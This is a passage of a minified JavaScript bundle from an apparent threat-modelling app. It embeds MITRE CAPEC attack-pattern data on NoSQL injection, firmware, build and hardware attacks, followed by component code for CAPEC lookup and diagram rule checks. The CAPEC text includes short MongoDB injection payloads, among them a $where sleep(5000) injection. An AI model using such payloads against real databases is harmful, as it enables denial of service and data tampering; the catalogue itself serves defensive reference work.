an empty string."],"div":["//NodeJS with Express.js",{"style":"margin-left:10px;","class":"bad","div":["db.collection(\'users\').find({",{"style":"margin-left:10px;","div":["\\"user\\": req.query.user,",{"style":"margin-left:10px;"}]}]},"//NodeJS with Express.js",{"style":"margin-left:10px;","class":"attack","div":["db.collection(\'users\').find({",{"style":"margin-left:10px;","div":["\\"user\\": bob,",{"style":"margin-left:10px;"}]}]}]},{"p":["MongoDB instances are also vulnerable to JavaScript Injection Attacks when user input is not properly validated and sanitized.","If the user properly specifies a username, then this code will execute as intended. However, an adversary can inject JavaScript into the \\"$username\\" variable to achieve a NoSQL Injection attack as follows:","This will result in the server sleeping for 5 seconds if the attack was successful. An adversary could supply a larger value to deny service to the application."],"div":["//PHP with MongoDB",{"style":"margin-left:10px;","class":"bad","div":["db.collection.find({$where: function() {",{"style":"margin-left:10px;","div":["return (this.username == $username) } } );",{"style":"margin-left:10px;"}]}]},"//PHP with MongoDB",{"style":"margin-left:10px;","class":"attack","div":["db.collection.find({$where: function() {",{"style":"margin-left:10px;","div":["return (this.username == \'foo\'; sleep(5000) ) } } );",{"style":"margin-left:10px;"}]}]}]},{"p":["If leveraging PHP with MongoDB, operator replacement attacks are possible if special query operators are not properly addressed. The below example from OWASP\'s \\"Test for NoSQL Injection\\" displays a simple case of how this could occur.[REF-668]","Even though the above query does not depend on any user input, it is vulnerable to a NoSQL injection attack via operator replacement on the \\"$where\\" keyword. In this case, the adversary could exploit MongoDB in the following manner:"],"div":["db.myCollection.find({$where: function() {",{"style":"margin-left:10px;","class":"bad","div":["return obj.credits - obj.debits < 0; } } );",{"style":"margin-left:10px;"}]},"$where: function() { //arbitrary JavaScript here }",{"style":"margin-left:10px;","class":"attack"}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"943"},{"CWE_ID":"1286"}]},"References":{"Reference":[{"External_Reference_ID":"REF-668"},{"External_Reference_ID":"REF-669"},{"External_Reference_ID":"REF-670"},{"External_Reference_ID":"REF-671"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-10-21"}}},"677":{"ID":"677","Name":"Server Functionality Compromise","Abstraction":"Detailed","Status":"Draft","Description":{"p":"Malware is inserted in a server motherboard (e.g., in the flash memory) in order to alter server functionality from that intended. The development environment or hardware/software support activity environment is susceptible to an adversary inserting malicious software into hardware components during development or update."},"Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"534"}},"Prerequisites":{"Prerequisite":"An adversary with access to hardware/software processes and tools within the development or hardware/software support environment can insert malicious software into hardware components during development or update/maintenance."},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":["Purchase IT systems, components and parts from government approved vendors whenever possible.","Establish diversity among suppliers.","Conduct rigorous threat assessments of suppliers.","Require that Bills of Material (BoM) for critical parts and components be certified.","Utilize contract language requiring contractors and subcontractors to flow down to subcontractors and suppliers SCRM and SCRA (Supply Chain Risk Assessment) requirements.","Establish trusted supplier networks."]},"Example_Instances":{"Example":{"p":"Malware is inserted into the Unified Extensible Firmware Interface (UEFI) software that resides on a flash memory chip soldered to a computer\u2019s motherboard. It is the first thing to turn on when a system is booted and is allowed access to almost every part of the operating system. Hence, the malware will have extensive control over operating system functions and persist after system reboots. [REF-685]"}},"References":{"Reference":[{"External_Reference_ID":"REF-439"},{"External_Reference_ID":"REF-660"},{"External_Reference_ID":"REF-685"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-10-21"}}},"678":{"ID":"678","Name":"System Build Data Maliciously Altered","Abstraction":"Detailed","Status":"Draft","Description":{"p":"During the system build process, the system is deliberately misconfigured by the alteration of the build data. Access to system configuration data files and build processes are susceptible to deliberate misconfiguration of the system."},"Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444"}},"Prerequisites":{"Prerequisite":"An adversary has access to the data files and processes used for executing system configuration and performing the build."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Execute Unauthorized Commands"},{"Scope":"Access Control","Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":["Modify Data","Read Data"]}]},"Mitigations":{"Mitigation":["Implement configuration management security practices that protect the integrity of software and associated data.","Monitor and control access to the configuration management system.","Harden centralized repositories against attack.","Establish acceptance criteria for configuration management check-in to assure integrity.","Plan for and audit the security of configuration management administration processes.","Maintain configuration control over operational systems."]},"Example_Instances":{"Example":{"p":"\u2018Make\u2019 is a program used for building executable programs and libraries from source code by executing commands and following rules in a \u2018makefile\u2019. It can create a malicious executable if commands or dependency paths in the makefile are maliciously altered to execute an unwanted command or reference as a dependency maliciously altered code."}},"References":{"Reference":[{"External_Reference_ID":"REF-439"},{"External_Reference_ID":"REF-660"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-10-21"}}},"679":{"ID":"679","Name":"Exploitation of Improperly Configured or Implemented Memory Protections","Abstraction":"Detailed","Status":"Draft","Description":{"p":"An adversary takes advantage of missing or incorrectly configured access control within memory to read/write data or inject malicious code into said memory."},"Extended_Description":{"p":"Hardware product designs often need to implement memory protection features to prevent users from reading and modifying memory reserved for security operations such as secure booting, authenticating code, device attestation, and more. However, these protection features may be missing if not configured by developers. For example, this can occur if the developers assume these features are configured elsewhere. Additionally, developers often attempt to impose proper protection features, but may incorrectly configure these controls. One such example would be setting controls with insufficient granularity for protected address regions. If an adversary is able to discover improper access controls surrounding memory, it could result in the adversary obtaining sensitive data, executing code, circumventing security mechanisms, escalating privileges, or even denying service to higher privilege software."},"Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"1","Exclude_Related":{"Exclude_ID":"513"}},{"Nature":"ChildOf","CAPEC_ID":"180","Exclude_Related":{"Exclude_ID":"513"}}]},"Prerequisites":{"Prerequisite":"Access to the hardware being leveraged."},"Skills_Required":{"Skill":["Ability to craft malicious code to inject into the memory region.",{"Level":"Medium"},"Intricate knowledge of memory structures.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Ensure that protected and unprotected memory ranges are isolated and do not overlap.","If memory regions must overlap, leverage memory priority schemes if memory regions can overlap.","Ensure that original and mirrored memory regions apply the same protections.","Ensure immutable code or data is programmed into ROM or write-once memory."]},"Example_Instances":{"Example":[{"p":"A hardware product contains non-volatile memory, which itself contains boot code that is insufficiently protected. An adversary then modifies this memory to either bypass the secure boot process or to execute their own code."},{"p":"A hardware product leverages a CPU that does not possess a memory-protection unit (MPU) and a memory-management unit (MMU) nor a special bit to support write exclusivity, resulting in no write exclusivity. Because of this, an adversary is able to inject malicious code into the memory and later execute it to achieve the desired outcome."}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1222"},{"CWE_ID":"1252"},{"CWE_ID":"1257"},{"CWE_ID":"1260"},{"CWE_ID":"1274"},{"CWE_ID":"1282"},{"CWE_ID":"1312"},{"CWE_ID":"1316"},{"CWE_ID":"1326"}]},"References":{"Reference":[{"External_Reference_ID":"REF-687"},{"External_Reference_ID":"REF-668"},{"External_Reference_ID":"REF-689"},{"External_Reference_ID":"REF-690"},{"External_Reference_ID":"REF-691"},{"External_Reference_ID":"REF-692"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-10-21"}}},"680":{"ID":"680","Name":"Exploitation of Improperly Controlled Registers","Abstraction":"Detailed","Status":"Draft","Description":{"p":"An adversary exploits missing or incorrectly configured access control within registers to read/write data that is not meant to be obtained or modified by a user."},"Extended_Description":{"p":"Hardware systems often utilize trusted lock bits to prevent a set of registers from being written to or to restrict a register to only being written to once. Registers are also frequently used to store sensitive data leveraged in additional security operations, such as secure booting, authenticating code, device attestation, and more. However, the access control mechanisms meant to protect these registers may be fully missing or ineffective due to misconfiguration. If an adversary is able to discover improper access controls surrounding registers, it could result in the adversary obtaining sensitive data and/or modifying data that is meant to be immutable. This can ultimately result in processes like secure boot being circumvented or in protected configurations being modified."},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"1","Exclude_Related":{"Exclude_ID":"513"}},{"Nature":"ChildOf","CAPEC_ID":"180","Exclude_Related":{"Exclude_ID":"513"}}]},"Prerequisites":{"Prerequisite":["Awareness of the hardware being leveraged.","Access to the hardware being leveraged."]},"Skills_Required":{"Skill":["Intricate knowledge of registers.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design proper access control policies for hardware register access from software and ensure these policies are implemented in accordance with the specified design.","Ensure security lock bit protections are reviewed for design inconsistencies and common weaknesses.","Test security lock programming flow in both pre-silicon and post-silicon environments.","Leverage automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros.","Ensure that measurement data is stored in registers that are read-only or otherwise have access controls that prevent modification by an untrusted agent."]},"Example_Instances":{"Example":{"p":"During a System-on-Chip\'s (SoC) secure boot process, the code to be authenticated is measured to determine the code\'s validity. This entails the one-way hash of the code binary being calculated and extended to the previous hash. The value obtained after completion of the boot flow is then stored in a register with the intent of later verifying this value to determine if the boot flow has been tampered with. However, the register being used does not prevent an adversary from modifying the register\'s contents, which can result in the adversary spoofing the measurement data used in the attestation process."}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1224"},{"CWE_ID":"1231"},{"CWE_ID":"1233"},{"CWE_ID":"1262"},{"CWE_ID":"1283"}]},"References":{"Reference":{"External_Reference_ID":"REF-693"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-10-21"}}},"681":{"ID":"681","Name":"Exploitation of Improperly Controlled Hardware Security Identifiers","Abstraction":"Detailed","Status":"Draft","Description":{"p":"An adversary takes advantage of missing or incorrectly configured security identifiers (e.g., tokens), which are used for access control within a System-on-Chip (SoC), to read/write data or execute a given action."},"Extended_Description":{"p":["A System-on-Chip (SoC) often implements a security identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, these mechanisms may be exploitable due to any number of the following:","If the security identifiers leveraged by the SoC are missing or misconfigured, an adversary may be able to take advantage of this shortcoming to circumvent the intended access controls. This could result in the adversary gaining unintended access, performing a Denial of Service (DoS), escalating privileges, or spoofing actions from a trusted agent."],"ul":{"li":["The security identifiers are missing","The security identifiers are incorrectly implemented or generated","The security identifiers are generated with an obsolete encoding","The security identifiers are generated and implemented correctly, but are improperly protected"]}},"Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"1","Exclude_Related":{"Exclude_ID":"513"}},{"Nature":"ChildOf","CAPEC_ID":"180","Exclude_Related":{"Exclude_ID":"513"}}]},"Prerequisites":{"Prerequisite":["Awareness of the hardware being leveraged.","Access to the hardware being leveraged."]},"Skills_Required":{"Skill":["Ability to execute actions within the SoC.",{"Level":"Medium"},"Intricate knowledge of the identifiers being utilized.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Review generation of security identifiers for design inconsistencies and common weaknesses.","Review security identifier decoders for design inconsistencies and common weaknesses.","Test security identifier definition, access, and programming flow in both pre-silicon and post-silicon environments."]},"Example_Instances":{"Example":{"p":"A system contains a register (divided into four 32-bit registers) that is used to store a 128-bit AES key for encryption/decryption, in addition to an access-policy register. The access-policy register determines which agents may access the AES-key registers, based on a corresponding security identifier. It is assumed the system has two agents: a Main-controller and an Aux-controller, with respective security identifiers \\"1\\" and \\"2\\". The Main-controller (ID \\"1\\") is meant to have access to the AES-key registers, while the Aux-controller (ID \\"2\\") has access to the access-policy register. If a SoC incorrectly generates security identifier \\"1\\" for both agents, then both agents will have access to the AES-key registers. This could further result in a Denial-of-Service (DoS) or the execution of an action that in turn could result in privilege escalation or unintended access."}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1259"},{"CWE_ID":"1267"},{"CWE_ID":"1270"},{"CWE_ID":"1294"},{"CWE_ID":"1302"}]},"References":{"Reference":[{"External_Reference_ID":"REF-694"},{"External_Reference_ID":"REF-695"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-10-21"}}},"Name":"VIEW LIST: CAPEC-1000: Mechanisms of Attack","Version":"3.6","Date":"2021-10-21"}');function Vpt(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n  "),m(2,"mat-form-field",2),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),it(8,"input",3),s(9,"\n  "),u(),s(10,"\n  "),m(11,"mat-form-field",4),s(12,"\n    "),m(13,"mat-label"),s(14),oe(15,"translate"),u(),s(16,"\n    "),it(17,"input",3),s(18,"\n  "),u(),s(19,"\n  "),m(20,"mat-form-field",4),s(21,"\n    "),m(22,"mat-label"),s(23),oe(24,"translate"),u(),s(25,"\n    "),it(26,"input",3),s(27,"\n  "),u(),s(28,"\n  "),m(29,"button",5),he("click",function(){return be(e),Me(B().OpenCAPEC())}),oe(30,"translate"),s(31,"\n    "),m(32,"mat-icon"),s(33,"open_in_new"),u(),s(34,"\n  "),u(),s(35,"\n  "),m(36,"mat-form-field",6),s(37,"\n    "),m(38,"mat-label"),s(39),oe(40,"translate"),u(),s(41,"\n    "),it(42,"textarea",7),s(43,"\n  "),u(),s(44,"\n"),u()}if(2&t){const e=B();C(5),ke(re(6,13,"properties.CAPECTitle")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCAPECTitle()),C(6),ke(re(15,15,"properties.likelihoodOfAttack")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCAPECProperty("Likelihood_Of_Attack")),C(6),ke(re(24,17,"properties.typicalSeverity")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCAPECProperty("Typical_Severity")),C(3),at("matTooltip",re(30,19,"general.openInNew")),C(10),ke(re(40,21,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCAPECProperty("Description"))}}let wZ=(()=>{class t{constructor(e){this.dataService=e}ngOnInit(){this.capecID||console.error("Unset capecID")}OpenCAPEC(){window.open(t.GetURL(this.capecID),"_blank")}GetCAPECTitle(){return t.GetCAPEDEntry(this.capecID)?"CAPEC-"+Qp[this.capecID].ID+": "+Qp[this.capecID].Name+" ("+Qp[this.capecID].Status+")":null}GetCAPECProperty(e){if(!t.GetCAPEDEntry(this.capecID))return null;let i=t.GetCAPEDEntry(this.capecID)[e];return null==i?"":"object"==typeof i&&null!==i&&null!=i.p?"[object Array]"===Object.prototype.toString.call(i.p)?i.p.join("\n"):i.p:i}GetCAPECConsequences(){return t.GetCAPEDEntry(this.capecID)&&Qp[this.capecID].Common_Consequences?Array.isArray(Qp[this.capecID].Common_Consequences.Consequence)?Qp[this.capecID].Common_Consequences.Consequence:[Qp[this.capecID].Common_Consequences.Consequence]:null}GetValues(e,i){return Array.isArray(e)?e.join(i?"; ":"\n"):e}static GetCAPEDEntry(e){return Qp[e]}static GetURL(e){return"https://capec.mitre.org/data/definitions/"+e.toString()+".html"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-capec-entry"]],inputs:{capecID:"capecID"},decls:1,vars:1,consts:[["style","pointer-events: none;",4,"ngIf"],[2,"pointer-events","none"],["appearance","fill",2,"width","calc(100% - 455px)","margin-right","5px"],["matInput","","type","text",3,"spellcheck","value"],["appearance","fill",2,"width","200px","margin-right","5px"],["mat-icon-button","","matTooltipShowDelay","1000",2,"vertical-align","super","pointer-events","all",3,"matTooltip","click"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","cdkTextareaAutosize","",3,"spellcheck","value"]],template:function(e,i){1&e&&ne(0,Vpt,45,23,"div",0),2&e&&V("ngIf",i.capecID)},dependencies:[Ri,oa,da,nn,un,Go,Xa,Pa,Xi]}),t})(),S7=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,ff,Fpt]}),t})();Ds(qp,[Zi,Ri,pm,_m,an,Ac,Ed,Ta,Dd,Ea,Sd,kd,oa,br,da,nn,un,mF,jr,Nr,yr,gg,Go,Xa,ts,is,Or,Lr,rc,pp,Xo,qo,po,Pa,il,Ec,Dc,tl,wl,gp,jg,T2],[Xi]),Ds(jg,[Zi,Ri,an,Ac,Ta,Ea,Sd,kd,oa,br,da,nn,un,jr,Nr,yr,gg,Go,Xa,qF,HF,UF,ts,is,Or,Lr,rc,Xo,qo,po,Pa,il,Ec,Dc,tl,wl,gp,N5,wZ,Wm,qp,T2],[Xi]),Ds(T2,[Zi,Ri,an,Ta,Ea,Sd,kd,oa,br,da,nn,un,jr,Nr,yr,gg,Go,Xa,ts,is,Or,Lr,rc,Pa,il,Ec,Dc,tl,wl,gp,qp,jg],[Xi]);var Fm=(()=>{return(t=Fm||(Fm={}))[t.AtLeastOneDF=1]="AtLeastOneDF",t[t.DFconnectsP=2]="DFconnectsP",t[t.TooManyProcesses=3]="TooManyProcesses",t[t.IFNotUsed=101]="IFNotUsed",Fm;var t})(),Fu=(()=>{return(t=Fu||(Fu={}))[t.Info=1]="Info",t[t.Warning=2]="Warning",t[t.Error=3]="Error",Fu;var t})();let Bpt=(()=>{class t{constructor(e){this.dataService=e}CheckDFDRules(e){if(!e.Elements)return[];let i=[];return e.DiagramType==xn.DataFlow?(i.push(...this.checkRule1(e)),i.push(...this.checkRule2(e)),i.push(...this.checkRule3(e))):i.push(...this.checkRule101(e)),i}checkRule1(e){let i=[],n=e.Elements.GetChildrenFlat(),r=n.filter(d=>[Et.LogExternalEntity,Et.PhyExternalEntity,Et.LogDataStore,Et.LogProcessing,Et.PhysicalLink].includes(d.Type.ElementTypeID));return n.filter(d=>d.Type.ElementTypeID==Et.DataFlow).forEach(d=>{if(d.Sender){let T=r.findIndex(k=>k.ID==d.Sender.ID);r.splice(T,1)}if(d.Receiver){let T=r.findIndex(k=>k.ID==d.Receiver.ID);r.splice(T,1)}}),r.forEach(d=>i.push({DiagramID:e.ID,RuleType:Fm.AtLeastOneDF,Type:Fu.Warning,Element:d})),i}checkRule2(e){let i=[];return e.Elements.GetChildrenFlat().filter(c=>c.Type.ElementTypeID==Et.DataFlow).forEach(c=>{let d=!1,T=!0;c.Sender&&(d=c.Sender.Type.ElementTypeID==Et.LogProcessing,T=c.Sender.Type.ElementTypeID==Et.PhysicalLink),!d&&c.Receiver&&(d=c.Receiver.Type.ElementTypeID==Et.LogProcessing,T=T&&c.Receiver.Type.ElementTypeID==Et.PhysicalLink),!d&&!T&&i.push({DiagramID:e.ID,RuleType:Fm.DFconnectsP,Type:Fu.Warning,Element:c})}),i}checkRule3(e){let i=[];return e.Elements.GetChildrenFlat().filter(c=>c.Type.ElementTypeID==Et.LogProcessing).length>7&&i.push({DiagramID:e.ID,RuleType:Fm.TooManyProcesses,Type:Fu.Warning,Element:null}),i}checkRule101(e){let i=[],n=e.Elements.GetChildrenFlat().filter(c=>c.Type.ElementTypeID==Et.Interface),r=this.dataService.Project.GetDFDElements().filter(c=>c.Type.ElementTypeID==Et.DataFlow);return n.forEach(c=>{r.some(d=>{var T,k;return(null===(T=d.SenderInterface)||void 0===T?void 0:T.ID)==c.ID||(null===(k=d.ReceiverInterface)||void 0===k?void 0:k.ID)==c.ID})||i.push({DiagramID:e.ID,RuleType:Fm.IFNotUsed,Type:Fu.Info,Element:c})}),i}}return t.\u0275fac=function(e){return new(e||t)(At(Yi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Hpt(t,a){1&t&&(m(0,"th",13),s(1," "),u())}function Upt(t,a){if(1&t&&(m(0,"td",14),s(1," "),m(2,"mat-icon"),s(3),u(),s(4," "),u()),2&t){const e=a.$implicit,i=B();C(3),ke(i.GetTypeIcon(e))}}function qpt(t,a){1&t&&(m(0,"th",15),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Issue")," "))}function Gpt(t,a){if(1&t&&(m(0,"td",14),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",re(2,1,i.GetRule(e))," ")}}function jpt(t,a){1&t&&(m(0,"th",15),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Element")," "))}function Qpt(t,a){if(1&t&&(m(0,"td",14),s(1),u()),2&t){const e=a.$implicit;Ct("selected-cell",B().IsElementSelected(e)),C(1),ct(" ",null==e.Element?null:e.Element.Name," ")}}function $pt(t,a){1&t&&it(0,"tr",16)}function Kpt(t,a){if(1&t){const e=Ye();m(0,"tr",17),he("click",function(){const r=be(e).$implicit;return Me(B().SelectIssue(r))}),s(1,"\n      "),u()}if(2&t){const e=a.$implicit;Ct("selected-item",B().IsIssueSelected(e)),V("id",e.ID)}}function Xpt(t,a){1&t&&(m(0,"tr",18),s(1,"\n        "),m(2,"td",19),s(3),oe(4,"translate"),u(),s(5,"\n      "),u()),2&t&&(C(3),ke(re(4,1,"pages.modeling.issuetable.noIssues")))}let Ypt=(()=>{class t{constructor(e,i,n){this.theme=e,this.dataService=i,this.dfdCop=n,this.changesCounter=0,this.isCalculatingIssues=!1,this._issues=[],this.displayedColumns=[],this.selectedObjectChanged=new Tt,this.issueCountChanged=new Tt;let r=()=>{0==this.changesCounter?setTimeout(()=>{this.isCalculatingIssues=!0,this.changesCounter++},10):this.changesCounter++,setTimeout(()=>{this.changesCounter--,0==this.changesCounter&&this.RefreshIssues()},3e3)};this.dataService.Project&&setTimeout(()=>{var c;null===(c=this.dataService.Project)||void 0===c||c.DFDElementsChanged.subscribe(d=>r())},1e3)}get selectedIssue(){return this._selectedIssue}set selectedIssue(e){this._selectedIssue=e}set selectedNode(e){this._selectedNode=e,this.displayedColumns=["type","rule","element"],this.RefreshIssues()}get selectedObject(){return this._selectedObject}set selectedObject(e){var i;e&&(null===(i=this._selectedObject)||void 0===i?void 0:i.ID)==e.ID||(this._selectedObject=e)}set filteredObject(e){this._filteredObject=e,this.RefreshIssues()}get Issues(){return this._issues}set Issues(e){this._filteredObject&&(e=e.filter(i=>i.Element==this._filteredObject)),this._issues=e,this.dataSource=new zd(e),this.dataSource.sort=this.sort,this.dataSource.sortingDataAccessor=(i,n)=>{var r;return"type"==n?i.Type:"rule"==n?i.RuleType:"element"==n?null===(r=i.Element)||void 0===r?void 0:r.Name:void console.error("Missing sorting header")},this.sort&&this.sort.sortChange.emit(this.sort)}ngOnInit(){}onKeyDown(e){var i;if(this.isActive&&"TEXTAREA"!=(null===(i=document.activeElement)||void 0===i?void 0:i.tagName)){if(this.selectedIssue){const n=(r,c)=>{this.SelectIssue(r[c]);const d=this.rows.find(T=>T.nativeElement.id===r[c].ID);null==d||d.nativeElement.scrollIntoView({block:"center",behavior:"smooth"})};if("ArrowDown"==e.key){const r=this.dataSource.sortData(this.dataSource.filteredData,this.sort),c=r.indexOf(this.selectedIssue);c<r.length-1&&n(r,c+1)}else if("ArrowUp"==e.key){const r=this.dataSource.sortData(this.dataSource.filteredData,this.sort),c=r.indexOf(this.selectedIssue);c>0&&n(r,c-1)}}["ArrowDown","ArrowUp"].includes(e.key)&&(e.preventDefault(),e.stopImmediatePropagation())}}RefreshIssues(){var e,i;null!==(e=this._selectedNode)&&void 0!==e&&e.data?(null===(i=this._selectedNode)||void 0===i?void 0:i.data)instanceof Vg&&(this.Issues=this.dfdCop.CheckDFDRules(this._selectedNode.data)):this.Issues=[],setTimeout(()=>{this.issueCountChanged.emit(this.Issues.length)},10),this.isCalculatingIssues=!1}SelectIssue(e){this.selectedIssue=e,e.Element&&this.selectedObjectChanged.emit(e.Element)}IsIssueSelected(e){return this.selectedIssue==e}IsElementSelected(e){return e&&this.selectedObject&&e.Element==this.selectedObject}GetRule(e){switch(e.RuleType){case Fm.AtLeastOneDF:return"pages.modeling.issuetable.atLeastOneDF";case Fm.DFconnectsP:return"pages.modeling.issuetable.DFconnectsP";case Fm.IFNotUsed:return"pages.modeling.issuetable.IFNotUsed";case Fm.TooManyProcesses:return"pages.modeling.issuetable.TooManyProcesses";default:return e.RuleType}}GetTypeIcon(e){return e.Type==Fu.Info?"info":e.Type==Fu.Warning?"warning":e.Type==Fu.Error?"error":void 0}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Bpt))},t.\u0275cmp=Wt({type:t,selectors:[["app-issue-table"]],viewQuery:function(e,i){if(1&e&&(Mi(al,5),Mi(xc,5,mi)),2&e){let n;Vt(n=Bt())&&(i.sort=n.first),Vt(n=Bt())&&(i.rows=n)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{isActive:"isActive",selectedNode:"selectedNode",selectedObject:"selectedObject",filteredObject:"filteredObject"},outputs:{selectedObjectChanged:"selectedObjectChanged",issueCountChanged:"issueCountChanged"},decls:35,vars:8,consts:[[2,"height","100%","display","grid","align-content","start"],[2,"overflow","auto"],["mat-table","","matSort","","matSortActive","type","matSortDirection","desc","matSortDisableClear","",2,"width","100%",3,"dataSource"],["matColumnDef","type"],["mat-header-cell","","mat-sort-header","","style","width: 34px;",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["matColumnDef","rule"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["matColumnDef","element"],["mat-cell","",3,"selected-cell",4,"matCellDef"],["mat-header-row","","style","height: 30px;",4,"matHeaderRowDef","matHeaderRowDefSticky"],["mat-row","",3,"id","selected-item","click",4,"matRowDef","matRowDefColumns"],["class","mat-row",4,"matNoDataRow"],["mat-header-cell","","mat-sort-header","",2,"width","34px"],["mat-cell",""],["mat-header-cell","","mat-sort-header",""],["mat-header-row","",2,"height","30px"],["mat-row","",3,"id","click"],[1,"mat-row"],["colspan","4",1,"mat-cell"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"table",2),s(5,"\n      "),bt(6,3),s(7,"\n        "),ne(8,Hpt,2,0,"th",4),s(9,"\n        "),ne(10,Upt,5,1,"td",5),s(11,"\n      "),Mt(),s(12,"\n      "),bt(13,6),s(14,"\n        "),ne(15,qpt,3,3,"th",7),s(16,"\n        "),ne(17,Gpt,3,3,"td",5),s(18,"\n      "),Mt(),s(19,"\n      "),bt(20,8),s(21,"\n        "),ne(22,jpt,3,3,"th",7),s(23,"\n        "),ne(24,Qpt,2,3,"td",9),s(25,"\n      "),Mt(),s(26,"\n  \n      "),ne(27,$pt,1,0,"tr",10),s(28,"\n      "),ne(29,Kpt,2,3,"tr",11),s(30,"\n      "),ne(31,Xpt,6,3,"tr",12),s(32,"\n    "),u(),s(33,"\n  "),u(),s(34,"\n"),u()),2&e&&(C(4),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSource),C(23),V("matHeaderRowDef",i.displayedColumns)("matHeaderRowDefSticky",!0),C(2),V("matRowDefColumns",i.displayedColumns))},dependencies:[oa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,Cp,al,bp,Xi],styles:[".primary-color[_ngcontent-%COMP%], .selected-cell[_ngcontent-%COMP%], .selected-item[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     